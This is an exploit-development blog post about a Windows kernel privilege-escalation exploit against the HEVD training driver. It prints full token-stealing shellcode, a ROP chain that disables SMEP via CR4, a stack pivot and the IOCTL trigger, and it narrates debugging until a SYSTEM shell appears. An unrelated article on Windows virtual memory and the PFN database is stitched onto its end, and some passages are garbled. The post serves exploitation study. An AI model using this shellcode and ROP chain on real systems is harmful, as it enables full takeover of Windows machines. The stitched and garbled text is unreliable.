BYTE sc[256] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
// Allocating shellcode in a pre-defined address [0x80000000]
LPVOID shellcode = VirtualAlloc((LPVOID)0x80000000, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlCopyMemory(shellcode, sc, 256);
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
int index = 0;
LPVOID fakeStack = VirtualAlloc((LPVOID)0x48000000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)SMEPBypass.STACK_PIVOT; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}

int main() {
SMEPBypassInitializer();
exploit();
return 0;
}

After the exploit executes, we have the following WinDBG output:

[CALL]ing the pre-calculated address in order to change the current RSP value to 0x48000000 (user-controlled)
A segmentation fault popped up after the mov esp, 0x48000000 execution
Analysis of the segmentation fault error

After the mov esp, 0x48000000 instruction executes, we notice that the kernel crashes and raises an exception named UNEXPECTED_KERNEL_MODE_TRAP (7F). Now let's look at our stack.

Stack frame after the crash

So, what can we do next?

Memory and Components

Now this blog post can really start. After briefly covering the techniques, it's time to explain why the stack is one of the most confusing things in exploit development, and how it can easily turn a simple vulnerability into a brain-melting issue.

Kernel Memory Management

An oversimplification of how a kernel connects application software to the hardware of a computer (wikipedia)

Now, we’ll have to go deep into Memory Managment topic as way to understand concepts about Memory Segments, Virtual Allocation, andΒ Paging.

According to Wikipedia

The kernel has full access to the system's memory and must allow processes to safely access this memory as they require it. Often the first step in doing this is virtual addressing, usually achieved by paging and/or segmentation. Virtual addressing allows the kernel to make a given physical address appear to be another address, the virtual address.
<...snip...>
In computing, a virtual address space (VAS) or address space is the set of ranges of virtual addresses that an operating system makes available to a process.[1] The range of virtual addresses usually starts at a low address and can extend to the highest address allowed by the computer's instruction set architecture and supported by the operating system's pointer size implementation, which can be 4 bytes for 32-bit or 8 bytes for 64-bit OS versions. This provides several benefits, one of which is security through process isolation assuming each process is given a separate address space.

As we can see, virtual addressing refers to the address space given to each user application and to kernel functions, reserving memory regions while the OS is in use. When an application is started, the operating system understands that it needs to allocate new space in memory, mapping it into a valid range of addresses and consequently avoiding damage to the kernel's current memory region.

That's what happens when you launch a game and, for some reason, several GB of your memory get consumed before the game even starts: the space was allocated, and most of that data and those addresses start out nullified until the game's file data begins to be loaded into memory.

Using functions like malloc() and VirtualAlloc(), you can effectively "address" a range of virtual memory at a chosen address, which is why stack pivoting is the best way to make this exploit work.
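
For example, committing a page at a chosen address from user land is a single call; a small sketch (the address and size are arbitrary, and the call can fail if the range is already in use):

#include <windows.h>
// Sketch: ask for a specific virtual address instead of letting the OS pick one
bool AllocAtFixedAddress() {
    LPVOID region = VirtualAlloc((LPVOID)0x48000000, 0x1000,
                                 MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!region) {
        return false;                    // the range may already be in use
    }
    // ... use the memory, then release it when it is no longer needed ...
    VirtualFree(region, 0, MEM_RELEASE);
    return true;
}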

Virtual Memory

Address difference between physical and virtual memory

As you can see in the image above, virtual addresses are what the application/process interacts with when sending data and values, so processes are able to query, allocate, or free that data at any time.

As Wikipedia says:

In computing, virtual memory, or virtual storage,[b] is a memory management technique that provides an "idealized abstraction of the storage resources that are actually available on a given machine"[3] which "creates the illusion to users of a very large (main) memory".[4]
The computer's operating system, using a combination of hardware and software, maps memory addresses used by a program, called virtual addresses, into physical addresses in computer memory. Main storage, as seen by a process or task, appears as a contiguous address space or collection of contiguous segments. The operating system manages virtual address spaces and the assignment of real memory to virtual memory.[5] Address translation hardware in the CPU, often referred to as a Memory Management Unit (MMU), automatically translates virtual addresses to physical addresses. Software within the operating system may extend these capabilities, utilizing, e.g., disk storage, to provide a virtual address space that can exceed the capacity of real memory and thus reference more memory than is physically present in the computer.
The primary benefits of virtual memory include freeing applications from having to manage a shared memory space, ability to share memory used by libraries between processes, increased security due to memory isolation, and being able to conceptually use more memory than might be physically available, using the technique of paging or segmentation.

As mentioned before, addressing/allocating virtual memory ranges (from a user-land perspective) allows us to manipulate how addresses and data are used inside our application, but there is a catch. When a range of virtual memory is allocated, it is not yet part of the OS's physical operations, because the allocation is only an abstraction in memory. Following our earlier example, when a game starts, virtual memory is allocated and the Memory Management Unit (MMU) automatically translates data between physical and virtual addresses.

From a developer's perspective, when an application consumes memory it's important to free()/VirtualFree() unused data so that it doesn't end up crashing the whole application once too many addresses are marked as in use by the system. The OS can also deal with processes that consume too many addresses, automatically terminating them to avoid critical errors. There are cases where applications exceed the amount of free RAM; in those situations the allocation can be extended onto disk storage.

Paged Memory

Physical memory, also referred to here as paged memory, is the memory actually in use by applications and processes. This memory scheme can retrieve data from virtual allocations and use that data as part of the current execution.

According to Wikipedia:

Memory Paging

In computer operating systems, memory paging (or swapping on some Unix-like systems) is a memory management scheme by which a computer stores and retrieves data from secondary storage for use in main memory. In this scheme, the operating system retrieves data from secondary storage in same-size blocks called pages. Paging is an important part of virtual memory implementations in modern operating systems, using secondary storage to let programs exceed the size of available physical memory.

Page faults

When a process tries to reference a page not currently mapped to a page frame in RAM, the processor treats this invalid memory reference as a page fault and transfers control from the program to the operating system.

Page Table

A page table is the data structure used by a virtual memory system in a computer operating system to store the mapping between virtual addresses and physical addresses. Virtual addresses are used by the program executed by the accessing process, while physical addresses are used by the hardware, or more specifically, by the Random-Access Memory (RAM) subsystem. The page table is a key component of virtual address translation that is necessary to access data in memory.

The kernel can identify when an address lies in paged memory by using the Page Table Entry (PTE), which distinguishes each type of allocation and how memory segments are mapped.

With the Page Table Entry (PTE), the kernel is able to map the correct offset in order to translate between addresses. If an invalidly mapped memory region shows up during translation, a page fault is raised and, in kernel context, the OS crashes. In the case of the Windows kernel, a _KTRAP_FRAME is built, and an error like the one below should be expected:

Stack Frame after exploit execution

Virtual Allocation issues in Windows systems

When developing a binary exploit, memory has to be manipulated in most cases. Using C/C++ functions such as VirtualAlloc(), if you allocate data at address 0x48000000 with size 0x1000, the range from 0x48000000 up to 0x48001000 is now "addressed" in the page table as virtual memory, but it will NOT yet be treated as resident physical memory by the kernel (it is not backed by a physical page). It's important to pay attention to this detail, because if you try to use the example above from a kernel-land perspective, a trap frame will be caught by WinDBG as follows:

Trying to use this virtual memory from the kernel causes a _KTRAP_FRAME

To deal with this issue, we can use the VirtualLock() function from C/C++, since it locks the specified region of the process's virtual address space into physical memory, thus preventing page faults. With that in mind, we can now back our virtual memory address with a physical one.

Now it should be possible to achieve code execution, right?

<...snip...>
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
int index = 0;
LPVOID fakeStack = VirtualAlloc((LPVOID)0x48000000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
// Mapping address to Physical Memory <------------
if (VirtualLock(fakeStack, 0x10000)) {
std::cout << "[+] Address Mapped to Physical Memory" << std::endl;
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)SMEPBypass.STACK_PIVOT; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
<...snip...>
Calling our Stack Pivoting gadget
Exception from WinDBG
Again, another UNEXPECTED_KERNEL_MODE_TRAP (7f)

Again, the same error popped up, even with the address locked into physical memory.

Pain and Suffering due to DoubleFaults

After millions of tests with different memory allocation patterns, I found a possible solution. According to Martin Mielke and kristal-g, a reserved memory region should exist just below the main allocation at address 0x48000000.

Kristal-G explanation about the cause of DoubleFault Exception
0x47fffff70 address being used by StackFrame

When a trap frame occurs, we can clearly see that addresses just below 0x48000000 are used by the stack, and if those addresses remain unallocated, they can't be used by the current stack frame.

As you can see, 0x47fffff70 is being used by our stack frame, but since our allocation starts at the 0x48000000 address, it is not a valid one. To deal with this issue, memory must be reserved before 0x48000000.

<...snip...>
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000-0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
<...snip...>

Now we can actually allocate starting at 0x48000000 - 0x1000, which finally lets us avoid the DoubleFault exception.

Let's run our exploit again; it should work!

Again....
The trap frame at 0x47fffff70 disappeared after the memory allocation

No matter how you try to manage memory, changing addresses or filling the stack with data and hoping it works out, it always gets caught and returns an exception, even when your code seems correct. It took me about 3 months of rebooting my VM and changing code to understand why this kept happening.

Stack vs DATA

Let's imagine the stack frame as a "big ball pit" full of data: when a new ball is "placed" into it, all the others "change" their position. That's exactly what happens when you try to manipulate memory by swapping the current stack for another one, as mov esp, 0x48000000 does. When the current stack frame is modified, it "believes" that the current physical memory is mapped to other processes, and you can actually see things like this after the crash.

<...snip...>
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000 - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Reserved memory before Stack Pivoting
*(INT64*)(0x48000000 - 0x1000) = 0xDEADBEEFDEADBEEF;
*(INT64*)(0x48000000 - 0x900) = 0xDEADBEEFDEADBEEF;

QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
Crash after mov esp, 0x48000000

After polluting the reserved space just below the stack pivot address, we can clearly see that different addresses popped up in our current stack frame, but our trap frame still remains at the same place as before, 0x47fffe70. If we fill the whole reserved region with 0x41 bytes, we'll notice that some bytes show up with different values, as below:

<...snip...>
// Filling up reserved space memory
RtlFillMemory((LPVOID)(0x48000000 - 0x1000), 0x1000, 'A');
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
0x41 bytes from our reserved memory space show up in the stack frame

With these results in mind, we have a few alternatives to consider for this situation:

  • Increase the size of the reserved memory space.
  • Try to find a way to fix the stack frame, since we apparently can't just reserve memory below the stack pivot address.

So, let's first try increasing the size of our reserved memory:

<...snip...>
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000 - 0x5000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Filling up reserved space memory
// Size increased to 0x5000
RtlFillMemory((LPVOID)(0x48000000 - 0x5000), 0x5000, 'A');
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
mov esp, 0x48000000 won’t caught any error, and our RIP register get fowarded into add esp,Β 0x28
After that, a DoubleFault exception was caught due add esp,Β 0x28
svchost.exe Crashed when add, esp 0x28Β executes

For some reason, after increased our reserved memory before mov esp, 0x48000000, the whole kernel has crashed, and when 0x48000000is moved into our current RSPregister, our stack framechanges to the User Processes Contextdue the size of address it self. That’s why i’ve mentioned before that stack seems to be a β€œBall pit” sometimes, and after all, we still getting the same Trap Frame exception.

No matter how you try to manipulate memory, it always will be caught and it will crash some application, after that, WinDBGwill handle it as an exception and BSODyour system in a terrible horrorΒ movie.

My experience trying everything that i had, to pass through this exception

Breakpoints??…. ooohh!…. Breakpoints!!!!

INT3, a.k.a. 0xCC, i.e. a breakpoint, can be described as a signal for a debugger to catch and stop the execution of an attached process or of code under development. It can be set by clicking a debug option somewhere in an IDE's UI, or by inserting the INT3 instruction directly into the target process through the 0xCC opcode. In the WinDBG command line, the bp command is available to breakpoint addresses as follows:

// Common Breakpoint, just stop into this address before it runs
bp 0x48000000

// Conditional Breakpoint, stop when r12 register is not equal to 1337
// if not equal, changes current r12 value to 0x1337
// if equal, changes r12 reg value with r13 one
bp 0x48000000 ".if( @r12 != 0x1337) { r12=1337 }.else { r12=r13 }"

etc...

Also, it’s possible to enjoy the use of this mechanism to breakpointa shellcode, and see if it code is running correctly during a exploitation development phase.

BYTE sc[256] = {
0xcc, // <--- We send a debbuger signal and stop it execution
// before code execution
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff
};

According to Wikipedia:

The INT3 instruction is a one-byte-instruction defined for use by debuggers to temporarily replace an instruction in a running program in order to set a code breakpoint. The more general INT XXh instructions are encoded using two bytes. This makes them unsuitable for use in patching instructions (which can be one byte long); see SIGTRAP.
The opcode for INT3 is 0xCC, as opposed to the opcode for INT immediate8, which is 0xCD immediate8. Since the dedicated 0xCC opcode has some desired special properties for debugging, which are not shared by the normal two-byte opcode for an INT3, assemblers do not normally generate the generic 0xCD 0x03 opcode from mnemonics.

After this explanation about breakpoints, it's important to note that every previous test was made with breakpoints in place in order to develop our exploit; but now it's time to forget about them and drop all INT3 instructions.

Let's try re-running our exploit without breakpointing anything.

cmd.exe opens and no crashes are caught

The kernel doesn't crash anymore, and system memory is still intact!

Now the shellcode is executed after our SMEP bypass through the ROP chain, and we're able to spawn an NT AUTHORITY\SYSTEM shell.

YES!! VICTORY!!

BAAAM!! Finally!!!! An NT AUTHORITY\SYSTEM shell after all!

Breakpoints…. HAHA!! BREAKPOINTS!

So now we can appreciate that breakpoints can also be a dangerous thing during exploit development.

The explanation for this issue seems to be quite simple. When the WinDBG debugger catches an exception from the kernel, the operating system gets a signal that something went wrong; but while a stack manipulation is in progress, everything you do is an exception. The operating system doesn't understand that "an attacker is trying to manipulate the stack", it just catches the exception and reboots itself, because the stack differs from your current kernel context.

This headache is similar to Structured Exception Handling (SEH) vulnerabilities, where setting breakpoints, or even attaching a debugger to a process, can cause crashes or render the target unusable.

In my case, the way past the exception was to drop all breakpoints and let the kernel continue, without rebooting, on a non-critical exception.

Final Considerations

With this blogpost, i’ve learned alot of content that i didn’t knew before starting to write. It was a fun experience and extreme technical (specially for me), it took me 2 days to write about a thing which cost me 3 months long! you should probably had 10 minutes read, which is awesome and makes me happyΒ too!

It’s important to note that most of this blogpost are deep explaining about memory itself, and trying to showing off how as an attacker is possible to improve our way to deal with troubles, looking around for all possibilities which can help us to achieve our goals, in that caseNT AUTHORITY\SYSTEM shell.

Beware of Stackand Breakpoints, this things can be a headache sometimes, and you will NEVER know until you think about changes your attack methodoly.

Thanks to the people who helped me along all thisΒ way:

  • First of all, thanks to my husband who holded me on, when I got myself stressed, with no clue what to do, and with alot of nightmares along all thisΒ months!
  • @xct_de
  • @gal_kristal
  • @33y0re

Hope you enjoyed!

Exploit Link (not so important at all)

References

Windows 10 x86/wow64 Userland heap


Exploring Windows virtual memory management


To start, each user-mode process is allowed a user-mode virtual address space ranging from 0x000`00000000 to 0x7ff`ffffffff, giving each process a theoretical maximum of 8TB of virtual memory that it can access. Then, each process also has a range of kernel-mode virtual memory that is split up into a number of different subsections. This much larger range gives the kernel a theoretical maximum of 248TB of virtual memory, ranging from 0xffff0800`00000000 to 0xffffffff`ffffffff. The remaining address space is not actually used by Windows, though, as we can see below.


Figure 3: All possible virtual memory, divided into the different ranges that Windows enforces. The virtual addresses for the kernel-mode regions may not be true on Windows 10, where these regions are subject to address space layout randomization (ASLR). Credits to Alex Ionescu for specific kernel space mappings.

Currently, there is an extremely large β€œno man's land” of virtual memory space between the user-mode and kernel-mode ranges of virtual memory. This range of memory isn't wasted, though, it's just not addressable due to the current architecture constraint of 48-bit virtual addresses, which we discussed in our previous article. If there existed a system with 16EB of physical memory - enough memory to address all possible 64-bit virtual memory - the extra physical memory would simply be used to hold the pages of other processes, so that many processes' memory ranges could be resident in physical memory at once.

As an aside, one other interesting property of the way Windows handles virtual address mapping is being able to quickly tell kernel pointers from user-mode pointers. Memory that is mapped as part of the kernel has the highest order bits of the address (the 16 bits we didn't use as part of the linear address translation) set to 1, while user-mode memory has them set to 0. This ensures that kernel-mode pointers begin with 0xFFFF and user-mode pointers begin with 0x0000.
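Put as a quick code sketch (a minimal check for illustration, not how Windows itself tests pointers), classifying a canonical x64 address only takes a look at those upper 16 bits:

#include <cstdint>

// Kernel-mode addresses are sign-extended with 1s (0xFFFF...),
// user-mode addresses with 0s (0x0000...).
bool IsKernelModePointer(uint64_t va) { return (va >> 48) == 0xFFFF; }
bool IsUserModePointer(uint64_t va)   { return (va >> 48) == 0x0000; }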

A tree of virtual memory: the VAD

We can see that the kernel-mode virtual memory is nicely divided into different sections. But what about user-mode memory? How does the memory manager know which portions of virtual memory have been allocated, which haven't, and details about each of those ranges? How can it know if a virtual address within a process is valid or invalid? It could walk the process' paging structures to figure this out every time the information was needed, but there is another way: the virtual address descriptor (VAD) tree.

Each process has a VAD tree that can be located in the VadRoot member of the aforementioned EPROCESS structure. The tree is a balanced binary search tree, with each node representing a region of virtual memory within the process.

Figure 4: The VAD tree is balanced with lower virtual page numbers to the left, and each node providing some additional details about the memory range.

Each node gives details about the range of addresses, the memory protection of that region, and some other metadata depending on the state of the memory it is representing.

We can use our friend WinDbg to easily list all of the entries in the VAD tree of a particular process. Let's have a look at the VAD entries from notepad.exe using !vad.


The range of addresses supported by a given VAD entry are stored as virtual page numbers - similar to a PFN, but simply in virtual memory. This means that an entry representing a starting VPN of 0x7f and an ending VPN of 0x8f would actually be representing virtual memory from address 0x00000000`0007f000 to 0x00000000`0008ffff.
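As a small sketch of that conversion (assuming the standard 4KB page size):

#include <cstdint>

uint64_t startVpn = 0x7f, endVpn = 0x8f;
uint64_t startVa  = startVpn << 12;            // 0x00000000`0007f000
uint64_t endVa    = ((endVpn + 1) << 12) - 1;  // 0x00000000`0008ffff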

There are a number of complexities of the VAD tree that are outside the scope of this article. For example, each node in the tree can be one of three different types depending on the state of the memory being represented. In addition, a VAD entry may contain information about the backing PTEs for that region of memory if that memory is shared. We will touch more on that concept in a later section.

Let's get physical

So we now know that Windows maintains separate paging structures for each individual process, and some details about the different virtual memory ranges that are defined. But the operating system also needs a central mechanism to keep track of each individual page of physical memory. After all, it needs to know what's stored in each physical page, whether it can write that data out to a paging file on disk to free up memory, how many processes are using that page for the purposes of shared memory, and plenty of other details for proper memory management.

That's where the page frame number (PFN) database comes in. A pointer to the base of this very large structure can be located at the symbol nt!MmPfnDatabase, but we know based on the kernel-mode memory ranges that it starts at the virtual address 0xfffffa80`00000000, except on Windows 10 where this is subject to ASLR. (As an aside, WinDbg has a neat extension for dealing with the kernel ASLR in Windows 10 - !vm 0x21 will get you the post-KASLR regions). For each physical page available on the system, there is an nt!_MMPFN structure allocated in the database to provide details about the page.

Figure 5: Each physical page in the system is represented by a PFN entry structure in this very large, contiguous data structure.

Though some of the bits of the nt!_MMPFN structure can vary depending on the state of the page, that structure generally looks something like this:


A page represented in the PFN database can be in a number of different states. The state of the page will determine what the memory manager does with the contents of that page.

We won't be focusing on the different states too much in this article, but there are a few of them: active, transition, modified, free, and bad, to name several. It is definitely worth mentioning that for efficiency reasons, Windows manages linked lists that are comprised of all of the nt!_MMPFN entries that are in a specific state. This makes it much easier to traverse all pages that are in a specific state, rather than having to walk the entire PFN database. For example, it can allow the memory manager to quickly locate all of the free pages when memory needs to be paged in from disk.

Figure 6: Different linked lists make it easier to walk the PFN database according to the state of the pages, e.g. walk all of the free pages contiguously.

Another purpose of the PFN database is to help facilitate the translation of physical addresses back to their corresponding virtual addresses. Windows uses the PFN database to accomplish this during calls such as nt!MmGetVirtualForPhysical. While it is technically possible to search all of the paging structures for every process on the system in order to work backwards up the paging structures to get the original virtual address, the fact that the nt!_MMPFN structure contains a reference to the backing PTE coupled with some clever allocation rules by Microsoft allow them to easily convert back to a virtual address using the PTE and some bit shifting.

For a little bit of practical experience exploring the PFN database, let's find a region of memory in notepad.exe that we can take a look at. One area of memory that could be of interest is the entry point of our application. We can use the !dh command to display the PE header information associated with a given module in order to track down the address of the entry point.

Because we've switched into a user-mode context in one of our previous examples, WinDbg will require us to reload our symbols so that it can make sense of everything again. We can do that using the .reload /f command. Then we can look at notepad.exe's headers:


Again, the output is quite verbose, so the section information at the bottom is omitted from the above snippet. We're interested in the address of entry point member of the optional header, which is listed as 0x3acc. That value is called a relative virtual address (RVA), and it's the number of bytes from the base address of the notepad.exe image. If we add that relative address to the base of notepad.exe, we should see the code located at our entry point.
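The math itself is trivial; a tiny sketch of it, with the image base inferred from the values in this example, looks like this:

#include <cstdint>

uint64_t imageBase  = 0x00000000ffd50000ULL; // base of notepad.exe in this example
uint64_t entryRva   = 0x3acc;                // "address of entry point" from the optional header
uint64_t entryPoint = imageBase + entryRva;  // 0x00000000`ffd53acc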


And we do see that the address resolves to notepad!WinMainCRTStartup, like we expected. Now we have the address of our target process' entry point: 00000000`ffd53acc.

While the above steps were a handy exercise in digging through parts of a loaded image, they weren't actually necessary since we had symbols loaded. We could have simply used the ? qualifier in combination with the symbol notepad!WinMainCRTStartup, as demonstrated below, or gotten the value of a handy pseudo-register that represents the entry point with r $exentry.


In any case, we now have the address of our entry point, which from here on we'll refer to as our β€œtarget” or the β€œtarget page”. We can now start taking a look at the different paging structures that support our target, as well as the PFN database entry for it.

Let's first take a look at the PFN database. We know the virtual address where this structure is supposed to start, but let's look for it the long way, anyway. We can easily find the beginning of this structure by using the ? qualifier and poi on the symbol name. The poi command treats its parameter as a pointer and retrieves the value located at that pointer.


Knowing that the PFN database begins at 0xfffffa80`00000000, we should be able to index easily to the entry that represents our target page. First we need to figure out the page frame number in physical memory that the target's PTE refers to, and then we can index into the PFN database by that number.

Looking back on what we learned from the previous article, we can grab the PTE information about the target page very easily using the handy !pte command.


The above result would indicate that the backing page frame number for the target is 0x65207b. That should be the index into the PFN database that we'll need to use. Remember that we'll need to multiply that index by the size of an nt!_MMPFN structure, since we're essentially trying to skip that many PFN entries.
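As a sketch of that index calculation (sizeof(nt!_MMPFN) happens to be 0x30 on this build, though it varies between Windows versions, and the database base here is the pre-KASLR address used throughout this article):

#include <cstdint>

uint64_t pfnDatabase = 0xfffffa8000000000ULL;           // nt!MmPfnDatabase
uint64_t pageFrame   = 0x65207bULL;                     // PFN backing the target page
uint64_t pfnEntry    = pfnDatabase + pageFrame * 0x30;  // 0xfffffa80`12f61710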


This looks like a valid PFN entry. We can verify that we've done everything correctly by first doing the manual calculation to figure out what the address of the PFN entry should be, and then comparing it to where WinDbg thinks it should be.


So based on the above, we know that the nt!_MMPFN entry for the page we're interested in should be located at 0xfffffa80`12f61710, and we can use a nice shortcut to verify if we're correct. As always in WinDbg, there is an easier way to obtain information from the PFN database. This can be done by using the !pfn command with the page frame number.


